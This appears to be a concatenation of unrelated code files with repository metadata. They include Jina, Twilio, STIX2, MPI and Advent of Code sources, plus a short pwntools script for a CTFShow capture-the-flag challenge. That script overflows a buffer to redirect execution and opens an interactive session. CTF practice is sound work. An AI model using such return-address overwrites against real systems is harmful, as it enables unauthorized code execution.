] | 2
|
2022-03-20T02:27:59.000Z
|
2022-03-20T02:28:02.000Z
|
CTFShow/pwn02.py
|
Don2025/CTFwriteUp
|
41e0a5bf87a1a02dd1548e621853c145ff64cedb
|
[
"MIT"
] | null | null | null |
CTFShow/pwn02.py
|
Don2025/CTFwriteUp
|
41e0a5bf87a1a02dd1548e621853c145ff64cedb
|
[
"MIT"
] | null | null | null |
from pwn import *
io = remote('pwn.challenge.ctf.show', 28185)
e = ELF('stack')
address = e.symbols['stack']
log.success('stack_func_address => %s' % hex(address).upper())
payload = b'a'*(0x9 + 0x4) + p32(address)
# payload = b'a'*(0x9 + 0x4) + p32(0x804850F)
io.sendline(payload)
io.interactive()
| 29.8
| 62
| 0.671141
|
acff8e4b8d9f35cefd647587de00025ef953861b
| 2,461
|
py
|
Python
|
jina/peapods/runtimes/gateway/http/__init__.py
|
vishalbelsare/jina
|
ae72cc5ce1f7e7f4c662e72e96ea21dddc28bf43
|
[
"Apache-2.0"
] | 15,179
|
2020-04-28T10:23:56.000Z
|
2022-03-31T14:35:25.000Z
|
jina/peapods/runtimes/gateway/http/__init__.py
|
manavshah123/jina
|
f18b04eb82d18a3c554e2892bbae4b95fc0cb13e
|
[
"Apache-2.0"
] | 3,912
|
2020-04-28T13:01:29.000Z
|
2022-03-31T14:36:46.000Z
|
jina/peapods/runtimes/gateway/http/__init__.py
|
manavshah123/jina
|
f18b04eb82d18a3c554e2892bbae4b95fc0cb13e
|
[
"Apache-2.0"
] | 1,955
|
2020-04-28T10:50:49.000Z
|
2022-03-31T12:28:34.000Z
|
import os
import asyncio
from jina import __default_host__
from .....importer import ImportExtensions
from ...zmq.asyncio import AsyncNewLoopRuntime
from .app import get_fastapi_app
__all__ = ['HTTPRuntime']
class HTTPRuntime(AsyncNewLoopRuntime):
"""Runtime for HTTP interface."""
async def async_setup(self):
"""
The async method setup the runtime.
Setup the uvicorn server.
"""
with ImportExtensions(required=True):
from uvicorn import Config, Server
class UviServer(Server):
"""The uvicorn server."""
async def setup(self, sockets=None):
"""
Setup uvicorn server.
:param sockets: sockets of server.
"""
config = self.config
if not config.loaded:
config.load()
self.lifespan = config.lifespan_class(config)
self.install_signal_handlers()
await self.startup(sockets=sockets)
if self.should_exit:
return
async def serve(self, **kwargs):
"""
Start the server.
:param kwargs: keyword arguments
"""
await self.main_loop()
from .....helper import extend_rest_interface
uvicorn_kwargs = self.args.uvicorn_kwargs or {}
self._server = UviServer(
config=Config(
app=extend_rest_interface(get_fastapi_app(self.args, self.logger)),
host=__default_host__,
port=self.args.port_expose,
log_level=os.getenv('JINA_LOG_LEVEL', 'error').lower(),
**uvicorn_kwargs
)
)
await self._server.setup()
async def async_run_forever(self):
"""Running method of ther server."""
await self._server.serve()
async def _wait_for_cancel(self):
"""Do NOT override this method when inheriting from :class:`GatewayPea`"""
# handle terminate signals
while not self.is_cancel.is_set() and not self._server.should_exit:
await asyncio.sleep(0.1)
await self.async_cancel()
async def async_teardown(self):
"""Shutdown the server."""
await self._server.shutdown()
async def async_cancel(self):
"""Stop the server."""
self._server.should_exit = True
| 29.297619
| 83
| 0.570093
|
acff8e824f8507d338bc4bf18d7a453261e9c447
| 953
|
py
|
Python
|
tests/test_phishing_detection.py
|
abhi-parmar/phishing_detection
|
7442ad7030ea986af0dabf72600dfb8ef16a6dfa
|
[
"MIT"
] | 5
|
2019-07-20T19:39:33.000Z
|
2020-10-08T14:16:53.000Z
|
tests/test_phishing_detection.py
|
abhi-parmar/phishing_detection
|
7442ad7030ea986af0dabf72600dfb8ef16a6dfa
|
[
"MIT"
] | 6
|
2019-07-20T18:03:38.000Z
|
2021-02-02T22:05:41.000Z
|
tests/test_phishing_detection.py
|
abhi-parmar/phishing_detection
|
7442ad7030ea986af0dabf72600dfb8ef16a6dfa
|
[
"MIT"
] | 1
|
2019-07-20T17:57:55.000Z
|
2019-07-20T17:57:55.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Tests for `phishing_detection` package."""
import unittest
from click.testing import CliRunner
from phishing_detection import phishing_detection
from phishing_detection import cli
class TestPhishing_detection(unittest.TestCase):
"""Tests for `phishing_detection` package."""
def setUp(self):
"""Set up test fixtures, if any."""
def tearDown(self):
"""Tear down test fixtures, if any."""
def test_000_something(self):
"""Test something."""
def test_command_line_interface(self):
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(cli.main)
assert result.exit_code == 0
assert 'phishing_detection.cli.main' in result.output
help_result = runner.invoke(cli.main, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
| 27.228571
| 74
| 0.66212
|
acff8ee104dc46d6a70421edd0fbe56f39d3540b
| 12,408
|
py
|
Python
|
tests/integration/chat/v2/service/test_channel.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 1,362
|
2015-01-04T10:25:18.000Z
|
2022-03-24T10:07:08.000Z
|
tests/integration/chat/v2/service/test_channel.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 299
|
2015-01-30T09:52:39.000Z
|
2022-03-31T23:03:02.000Z
|
tests/integration/chat/v2/service/test_channel.py
|
BrimmingDev/twilio-python
|
3226b5fed92b3c2ce64f03e6b19fc4792ef7647f
|
[
"MIT"
] | 622
|
2015-01-03T04:43:09.000Z
|
2022-03-29T14:11:00.000Z
|
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class ChannelTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels/CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:37Z",
"created_by": "system",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete(x_twilio_webhook_enabled="true")
headers = {'X-Twilio-Webhook-Enabled': "true", }
self.holodeck.assert_has_request(Request(
'delete',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels/CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
headers=headers,
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.create(x_twilio_webhook_enabled="true")
headers = {'X-Twilio-Webhook-Enabled': "true", }
self.holodeck.assert_has_request(Request(
'post',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels',
headers=headers,
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:38Z",
"created_by": "username",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.create()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.list()
self.holodeck.assert_has_request(Request(
'get',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"channels": [
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:37Z",
"created_by": "system",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
],
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"next_page_url": null,
"key": "channels"
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"channels": [],
"meta": {
"page": 0,
"page_size": 50,
"first_page_url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"previous_page_url": null,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels?PageSize=50&Page=0",
"next_page_url": null,
"key": "channels"
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels.list()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update(x_twilio_webhook_enabled="true")
headers = {'X-Twilio-Webhook-Enabled': "true", }
self.holodeck.assert_has_request(Request(
'post',
'https://chat.twilio.com/v2/Services/ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX/Channels/CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
headers=headers,
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"service_sid": "ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"friendly_name": "friendly_name",
"unique_name": "unique_name",
"attributes": "{ \\"foo\\": \\"bar\\" }",
"type": "public",
"date_created": "2015-12-16T22:18:37Z",
"date_updated": "2015-12-16T22:18:38Z",
"created_by": "username",
"members_count": 0,
"messages_count": 0,
"url": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"members": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Members",
"messages": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Messages",
"invites": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Invites",
"webhooks": "https://chat.twilio.com/v2/Services/ISaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Channels/CHaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/Webhooks",
"last_message": null
}
}
'''
))
actual = self.client.chat.v2.services("ISXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX") \
.channels("CHXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
| 46.646617
| 166
| 0.580674
|
acff8f7067cb8b1a9e22205ca617e1d08c5c1c85
| 4,706
|
py
|
Python
|
content/exercise/autocorrelation_mpi.py
|
qianglise/HPDA-Python
|
93eefae38569bce35e82586c17ed4a164c3db1c4
|
[
"CC-BY-4.0",
"MIT"
] | null | null | null |
content/exercise/autocorrelation_mpi.py
|
qianglise/HPDA-Python
|
93eefae38569bce35e82586c17ed4a164c3db1c4
|
[
"CC-BY-4.0",
"MIT"
] | 17
|
2022-03-01T13:12:11.000Z
|
2022-03-31T09:55:45.000Z
|
content/exercise/autocorrelation_mpi.py
|
qianglise/HPDA-Python
|
93eefae38569bce35e82586c17ed4a164c3db1c4
|
[
"CC-BY-4.0",
"MIT"
] | 2
|
2022-03-01T16:33:10.000Z
|
2022-03-07T07:48:03.000Z
|
import sys
import numpy as np
from wordcount import load_word_counts, load_text, DELIMITERS
import time
from mpi4py import MPI
def preprocess_text(text):
"""
Remove delimiters, split lines into words and remove whitespaces,
and make lowercase. Return list of all words in the text.
"""
clean_text = []
for line in text:
for purge in DELIMITERS:
line = line.replace(purge, " ")
words = line.split()
for word in words:
word = word.lower().strip()
clean_text.append(word)
return clean_text
def word_acf(word, text, timesteps):
"""
Calculate word-autocorrelation function for given word
in a text. Each word in the text corresponds to one "timestep".
"""
acf = np.zeros((timesteps,))
mask = [w==word for w in text]
nwords_chosen = np.sum(mask)
nwords_total = len(text)
for t in range(timesteps):
for i in range(1,nwords_total-t):
acf[t] += mask[i]*mask[i+t]
acf[t] /= nwords_chosen
return acf
def ave_word_acf(words, text, timesteps=100):
"""
Calculate an average word-autocorrelation function
for a list of words in a text.
"""
acf = np.zeros((len(words), timesteps))
for n, word in enumerate(words):
acf[n, :] = word_acf(word, text, timesteps)
return np.average(acf, axis=0)
def ave_word_acf_p2p(comm, my_words, text, timesteps=100):
rank = comm.Get_rank()
n_ranks = comm.Get_size()
# each rank computes its own set of acfs
my_acfs = np.zeros((len(my_words), timesteps))
for i, word in enumerate(my_words):
my_acfs[i,:] = word_acf(word, text, timesteps)
if rank == 0:
results = []
# append own results
results.append(my_acfs)
# receive data from other ranks and append to results
for sender in range(1, n_ranks):
results.append(comm.recv(source=sender, tag=12))
# compute total
acf_tot = np.zeros((timesteps,))
for i in range(n_ranks):
for j in range(len(results[i])):
acf_tot += results[i][j]
return acf_tot
else:
# send data
comm.send(my_acfs, dest=0, tag=12)
def ave_word_acf_gather(comm, my_words, text, timesteps=100):
rank = comm.Get_rank()
n_ranks = comm.Get_size()
# each rank computes its own set of acfs
my_acfs = np.zeros((len(my_words), timesteps))
for i, word in enumerate(my_words):
my_acfs[i,:] = word_acf(word, text, timesteps)
# gather results on rank 0
results = comm.gather(my_acfs, root=0)
# loop over ranks and results. result is a list of lists of ACFs
if rank == 0:
acf_tot = np.zeros((timesteps,))
for i in range(n_ranks):
for j in range(len(results[i])):
acf_tot += results[i][j]
return acf_tot
def setup(book, wc_book, nwords = 16):
# load book text and preprocess it
text = load_text(book)
clean_text = preprocess_text(text)
# load precomputed word counts and select top words
word_count = load_word_counts(wc_book)
top_words = [w[0] for w in word_count[:nwords]]
return clean_text, top_words
def mpi_acf(book, wc_book, nwords = 16, timesteps = 100):
# initialize MPI
comm = MPI.COMM_WORLD
rank = comm.Get_rank()
n_ranks = comm.Get_size()
# load book text and preprocess it
clean_text, top_words = setup(book, wc_book, nwords)
# distribute words among MPI tasks
count = nwords // n_ranks
remainder = nwords % n_ranks
# first 'remainder' ranks get 'count + 1' tasks each
if rank < remainder:
first = rank * (count + 1)
last = first + count + 1
# remaining 'nwords - remainder' ranks get 'count' task each
else:
first = rank * count + remainder
last = first + count
# each rank gets unique words
my_words = top_words[first:last]
print(f"My rank number is {rank} and first, last = {first}, {last}")
# use collective function
acf_tot = ave_word_acf_gather(comm, my_words, clean_text, timesteps)
# use p2p function
#acf_tot = ave_word_acf_p2p(comm, my_words, clean_text, timesteps)
# only rank 0 has the averaged data
if rank == 0:
return acf_tot / nwords
if __name__ == '__main__':
# load book text and preprocess it
book = sys.argv[1]
wc_book = sys.argv[2]
filename = sys.argv[3]
acf = mpi_acf(book, wc_book, 16, 100)
rank = MPI.COMM_WORLD.Get_rank()
if rank == 0:
nsteps = len(acf)
output = np.vstack((np.arange(1,nsteps+1), acf)).T
np.savetxt(filename, output, delimiter=',')
| 32.013605
| 72
| 0.624522
|
acff911f212218a5e29506367a0c1bd745837ca1
| 7,981
|
py
|
Python
|
stix2/v20/common.py
|
maybe-sybr/cti-python-stix2
|
e9d417de2592c0c7367c312ca0fd25dc8f8a9818
|
[
"BSD-3-Clause"
] | 1
|
2021-06-23T09:44:17.000Z
|
2021-06-23T09:44:17.000Z
|
stix2/v20/common.py
|
maybe-sybr/cti-python-stix2
|
e9d417de2592c0c7367c312ca0fd25dc8f8a9818
|
[
"BSD-3-Clause"
] | null | null | null |
stix2/v20/common.py
|
maybe-sybr/cti-python-stix2
|
e9d417de2592c0c7367c312ca0fd25dc8f8a9818
|
[
"BSD-3-Clause"
] | null | null | null |
"""STIX 2.0 Common Data Types and Properties."""
from collections import OrderedDict
import copy
from ..custom import _custom_marking_builder
from ..markings import _MarkingsMixin
from ..markings.utils import check_tlp_marking
from ..properties import (
HashesProperty, IDProperty, ListProperty, Property, ReferenceProperty,
SelectorProperty, StringProperty, TimestampProperty, TypeProperty,
)
from ..utils import NOW, _get_dict
from .base import _STIXBase20
from .vocab import HASHING_ALGORITHM
def _should_set_millisecond(cr, marking_type):
# TLP instances in the 2.0 spec have millisecond precision unlike other markings
if marking_type == TLPMarking:
return True
# otherwise, precision is kept from how it was given
if isinstance(cr, str):
if '.' in cr:
return True
else:
return False
if cr.precision == 'millisecond':
return True
return False
class ExternalReference(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709261>`__.
"""
_properties = OrderedDict([
('source_name', StringProperty(required=True)),
('description', StringProperty()),
('url', StringProperty()),
('hashes', HashesProperty(HASHING_ALGORITHM, spec_version='2.0')),
('external_id', StringProperty()),
])
def _check_object_constraints(self):
super(ExternalReference, self)._check_object_constraints()
self._check_at_least_one_property(['description', 'external_id', 'url'])
class KillChainPhase(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709267>`__.
"""
_properties = OrderedDict([
('kill_chain_name', StringProperty(required=True)),
('phase_name', StringProperty(required=True)),
])
class GranularMarking(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709290>`__.
"""
_properties = OrderedDict([
('marking_ref', ReferenceProperty(valid_types='marking-definition', spec_version='2.0', required=True)),
('selectors', ListProperty(SelectorProperty, required=True)),
])
class TLPMarking(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709287>`__.
"""
# TODO: don't allow the creation of any other TLPMarkings than the ones below
_type = 'tlp'
_properties = OrderedDict([
('tlp', StringProperty(required=True)),
])
class StatementMarking(_STIXBase20):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709286>`__.
"""
_type = 'statement'
_properties = OrderedDict([
('statement', StringProperty(required=True)),
])
def __init__(self, statement=None, **kwargs):
# Allow statement as positional args.
if statement and not kwargs.get('statement'):
kwargs['statement'] = statement
super(StatementMarking, self).__init__(**kwargs)
class MarkingProperty(Property):
"""Represent the marking objects in the ``definition`` property of
marking-definition objects.
"""
def clean(self, value, allow_custom=False):
if type(value) in OBJ_MAP_MARKING.values():
return value, False
else:
raise ValueError("must be a Statement, TLP Marking or a registered marking.")
class MarkingDefinition(_STIXBase20, _MarkingsMixin):
"""For more detailed information on this object's properties, see
`the STIX 2.0 specification <http://docs.oasis-open.org/cti/stix/v2.0/cs01/part1-stix-core/stix-v2.0-cs01-part1-stix-core.html#_Toc496709284>`__.
"""
_type = 'marking-definition'
_properties = OrderedDict([
('type', TypeProperty(_type, spec_version='2.0')),
('id', IDProperty(_type, spec_version='2.0')),
('created_by_ref', ReferenceProperty(valid_types='identity', spec_version='2.0')),
('created', TimestampProperty(default=lambda: NOW)),
('definition_type', StringProperty(required=True)),
('definition', MarkingProperty(required=True)),
('external_references', ListProperty(ExternalReference)),
('object_marking_refs', ListProperty(ReferenceProperty(valid_types='marking-definition', spec_version='2.0'))),
('granular_markings', ListProperty(GranularMarking)),
])
def __init__(self, **kwargs):
if set(('definition_type', 'definition')).issubset(kwargs.keys()):
# Create correct marking type object
try:
marking_type = OBJ_MAP_MARKING[kwargs['definition_type']]
except KeyError:
raise ValueError("definition_type must be a valid marking type")
if 'created' in kwargs:
if _should_set_millisecond(kwargs['created'], marking_type):
self._properties = copy.deepcopy(self._properties)
self._properties.update([
('created', TimestampProperty(default=lambda: NOW, precision='millisecond')),
])
if not isinstance(kwargs['definition'], marking_type):
defn = _get_dict(kwargs['definition'])
kwargs['definition'] = marking_type(**defn)
super(MarkingDefinition, self).__init__(**kwargs)
def _check_object_constraints(self):
super(MarkingDefinition, self)._check_object_constraints()
check_tlp_marking(self, '2.0')
def serialize(self, pretty=False, include_optional_defaults=False, **kwargs):
check_tlp_marking(self, '2.0')
return super(MarkingDefinition, self).serialize(pretty, include_optional_defaults, **kwargs)
OBJ_MAP_MARKING = {
'tlp': TLPMarking,
'statement': StatementMarking,
}
def CustomMarking(type='x-custom-marking', properties=None):
"""Custom STIX Marking decorator.
Example:
>>> from stix2 import CustomMarking
>>> from stix2.properties import IntegerProperty, StringProperty
>>> @CustomMarking('x-custom-marking', [
... ('property1', StringProperty(required=True)),
... ('property2', IntegerProperty()),
... ])
... class MyNewMarkingObjectType():
... pass
"""
def wrapper(cls):
return _custom_marking_builder(cls, type, properties, '2.0', _STIXBase20)
return wrapper
# TODO: don't allow the creation of any other TLPMarkings than the ones below
TLP_WHITE = MarkingDefinition(
id='marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='white'),
)
TLP_GREEN = MarkingDefinition(
id='marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='green'),
)
TLP_AMBER = MarkingDefinition(
id='marking-definition--f88d31f6-486f-44da-b317-01333bde0b82',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='amber'),
)
TLP_RED = MarkingDefinition(
id='marking-definition--5e57c739-391a-4eb3-b6be-7d15ca92d5ed',
created='2017-01-20T00:00:00.000Z',
definition_type='tlp',
definition=TLPMarking(tlp='red'),
)
| 36.778802
| 149
| 0.677609
|
acff915344dd3b64dafcb47e057a363f4e6c29b9
| 3,622
|
py
|
Python
|
2019/day10.py
|
gcalmettes/AdventOfCode2017
|
374347c981b603981b7d0b21dad3fc594b126c82
|
[
"MIT"
] | 1
|
2021-12-12T22:59:49.000Z
|
2021-12-12T22:59:49.000Z
|
2019/day10.py
|
gcalmettes/AdventOfCode2017
|
374347c981b603981b7d0b21dad3fc594b126c82
|
[
"MIT"
] | null | null | null |
2019/day10.py
|
gcalmettes/AdventOfCode2017
|
374347c981b603981b7d0b21dad3fc594b126c82
|
[
"MIT"
] | 1
|
2019-12-03T05:37:49.000Z
|
2019-12-03T05:37:49.000Z
|
from typing import List, Dict, NamedTuple, Tuple, Iterator
import math
from collections import defaultdict
class Asteroid(NamedTuple):
x: int
y: int
Asteroids = List[Asteroid]
def parse(raw: str) -> Asteroids:
return [
Asteroid(x, y)
for y, line in enumerate(raw.strip().split("\n"))
for x, c in enumerate(line)
if c == '#'
]
def count_visible(asteroids: Asteroids, station: Asteroid) -> int:
# recenter
slopes = set()
for x, y in asteroids:
dx = x - station.x
dy = y - station.y
gcd = math.gcd(dx, dy)
if dx == dy == 0:
pass
else:
slopes.add((dx / gcd, dy / gcd))
return len(slopes)
def best_station(asteroids: Asteroids) -> Tuple[Asteroid, int]:
results = [(a, count_visible(asteroids, a)) for a in asteroids]
return max(results, key=lambda pair: pair[1])
RAW = """.#..#
.....
#####
....#
...##"""
ASTEROIDS = parse(RAW)
assert best_station(ASTEROIDS) == (Asteroid(3, 4), 8)
A2 = parse("""......#.#.
#..#.#....
..#######.
.#.#.###..
.#..#.....
..#....#.#
#..#....#.
.##.#..###
##...#..#.
